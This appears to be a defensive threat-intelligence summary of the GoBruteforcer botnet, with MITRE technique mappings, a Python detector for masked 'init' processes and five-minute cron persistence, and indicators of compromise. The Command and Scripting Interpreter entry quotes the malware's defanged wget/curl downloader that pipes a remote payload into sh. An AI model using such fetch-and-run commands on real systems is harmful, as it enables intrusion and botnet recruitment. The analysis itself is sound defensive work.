Inside GoBruteforcer: AI-Generated Server Defaults, Weak Passwords, and Crypto-Focused Campaigns

GoBruteforcer is a modular Go-based botnet that brute-forces FTP, MySQL, PostgreSQL and phpMyAdmin credentials to compromise Linux servers and recruit them as scanning and brute-force nodes. The 2025 variant adds an obfuscated Go IRC bot, downloader modules, process masking and cron persistence, and has been observed targeting crypto project databases and legacy stacks such as XAMPP that expose weak defaults.

Key points

  • GoBruteforcer (aka GoBrut) is a Go-written botnet that brute-forces credentials for FTP, MySQL, PostgreSQL and phpMyAdmin to compromise internet-exposed Linux servers.
  • The infection chain commonly follows web shell → downloader → IRC bot → bruteforcer modules, with compromised hosts serving as scanners, distribution points, or C2 relays.
  • The 2025 variant is fully rewritten in Go, obfuscated with Garbler, packed with UPX (signature patched), and includes process-masking and argv overwriting to evade discovery.
  • Campaign drivers include widespread reuse of default/example usernames (amplified by AI-generated deployment snippets) and legacy stacks like XAMPP exposing FTP/phpMyAdmin with weak defaults.
  • Operators use IRC-based C2 on custom servers/channels with strict server-side restrictions and message-origin checks to prevent hijacking and monitoring.
  • At least one observed campaign targeted crypto projects: operators deployed TRON balance scanners and token-sweep utilities and moved funds to identified TRON and BSC wallets.

MITRE Techniques

  • [T1110] Brute Force – The botnet systematically attempts common username:password pairs against FTP, MySQL, PostgreSQL and phpMyAdmin (‘GoBruteforcer… brute-forces user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.’).
  • [T1505.003] Web Shell – Initial compromise often involves uploading or using a PHP web shell to deliver additional payloads (‘the typical next step is to upload a web shell into the webroot.’).
  • [T1105] Ingress Tool Transfer – Downloaders fetch architecture-specific payloads (IRC bot, bruteforcer) via wget/curl and execute them (‘download and execute additional malicious software (such as an IRC bot).’ / example shell downloader shown).
  • [T1059] Command and Scripting Interpreter – Shell scripts and /bin/sh -c are used for payload execution, updates, and command execution (‘(wget -qO - "http[:]///.x/test2.php?x=`uname -m`" || curl -[sL] …) | sh’).
  • [T1053.005] Scheduled Task/Job (Cron) – Persistence is maintained via cron entries that restart the binary every five minutes (‘cron, which restarts the binary every five minutes (*/5 * * * *).’).
  • [T1071.004] Application Layer Protocol: IRC – The bot communicates with operators over IRC channels for command-and-control (‘an IRC bot that enables remote control of the compromised host’ and detailed IRC interaction described).
  • [T1027] Obfuscated Files or Information – Binaries are obfuscated with Garbler and packed with UPX (with patched signature) to hinder analysis (‘all samples are obfuscated with Garbler… packed with UPX.’).
  • [T1036] Masquerading – The malware alters its visible process name and overwrites argv to masquerade as a legitimate system process (the fake process name used is ‘init’, and argv is replaced so tools show ‘init’).
  • [T1041] Exfiltration Over Command and Control Channel – Successful credentials are reported back to C2 via HTTP GET requests to a /pst endpoint (‘exfiltrated via a plain HTTP GET request to the C2’s /pst endpoint’).
  • [T1078] Valid Accounts – Discovered weak credentials are reused to create backdoor accounts, steal data, and expand access (‘Newly discovered weak credentials are used to steal data, create backdoor accounts, sell access, and expand the botnet.’).
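As an added defender-side example (not code from the report or the Check Point researchers), this Python script checks a Linux host for two of the traits listed above: a process whose argv[0] was rewritten to ‘init’ while its executable is not a real init binary (Masquerading), and a */5 cron entry that restarts something from a scratch or web directory (Scheduled Task/Job). The list of legitimate init paths, the suspect directories, and the sample processes and crontab lines are assumptions constructed for the demo.

```python
import os
import re
from dataclasses import dataclass

# Resolved /proc/<pid>/exe targets a genuine init can have (assumed list).
LEGIT_INIT_EXES = {"/sbin/init", "/usr/sbin/init", "/lib/systemd/systemd",
                   "/usr/lib/systemd/systemd"}
# Directories a legitimate every-5-minute job rarely runs from (heuristic).
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/var/www/")
EVERY5 = re.compile(r"^\*/5\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>\S.*)$")

@dataclass
class Proc:
    pid: int
    cmdline: str  # raw /proc/<pid>/cmdline (NUL-separated) or ps-style text
    exe: str      # resolved target of /proc/<pid>/exe

def is_masqueraded_init(p: Proc) -> bool:
    """argv[0] says 'init' but the backing binary is not a real init."""
    argv0 = p.cmdline.split("\0", 1)[0].split(" ", 1)[0]
    return (p.pid != 1 and os.path.basename(argv0) == "init"
            and p.exe not in LEGIT_INIT_EXES)

def suspicious_cron_entries(crontab_text: str) -> list[str]:
    """Commands of */5 cron lines that execute from a suspect directory."""
    hits = []
    for line in crontab_text.splitlines():
        m = EVERY5.match(line.strip())
        if m and m.group("cmd").startswith(SUSPECT_DIRS):
            hits.append(m.group("cmd"))
    return hits

def collect_procs() -> list[Proc]:
    """Snapshot live processes from /proc (Linux); unreadable ones are skipped."""
    procs = []
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{name}/cmdline", "rb") as f:
                cmd = f.read().decode(errors="replace")
            procs.append(Proc(int(name), cmd, os.readlink(f"/proc/{name}/exe")))
        except OSError:
            continue
    return procs

# Constructed sample data (not from the report): one masked bot, two real inits.
SAMPLE_PROCS = [Proc(1, "/sbin/init\0", "/usr/lib/systemd/systemd"),
                Proc(4242, "init\0", "/tmp/.x/gobrut"), Proc(4300, "init\0", "/sbin/init")]
SAMPLE_CRONTAB = ("0 3 * * * /usr/bin/certbot renew\n"
                  "*/5 * * * * /tmp/.x/init_start >/dev/null 2>&1\n"
                  "*/5 * * * * /usr/local/bin/healthcheck\n")
```

On a live Linux host, run `is_masqueraded_init` over `collect_procs()` and `suspicious_cron_entries` over each user's crontab; on the sample data only pid 4242 and the /tmp/.x cron line are flagged.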

Indicators of Compromise

  • [IP address] C2 servers and observed infrastructure – 190.14.37.10, 93.113.25.114
  • [Domain] C2 / distribution domains – xyz.yuzgebhmwu[.]ru, fi.warmachine[.]su, and 3 more domains (pool.breakfastidentity[.]ru, pandaspandas[.]pm, my.magicpandas[.]fun)
  • [File hash] Malware and web shell samples – de7994277a81cf48f575f7245ec782c82452bb928a55c7fae11c2702cc308b8b (PHP web shell), 7423b6424b26c7a32ae2388bc23bef386c30e9a6acad2b63966188cb49c283ad (IRC bot), and 7 more sample hashes
  • [File name / script] Downloader/updater and bruteforcer helpers – init_start, init_stop (used by the downloader/updater workflow)
  • [Crypto wallet] Attacker recipient addresses observed on-chain – TRON TF5LUPC7MQWMcCgRLThY1v8zsHuoz1sBZW, BSC 0x208a8Ce726443B7ED9B621be70Cee7b2bB6723B2

Read more: https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/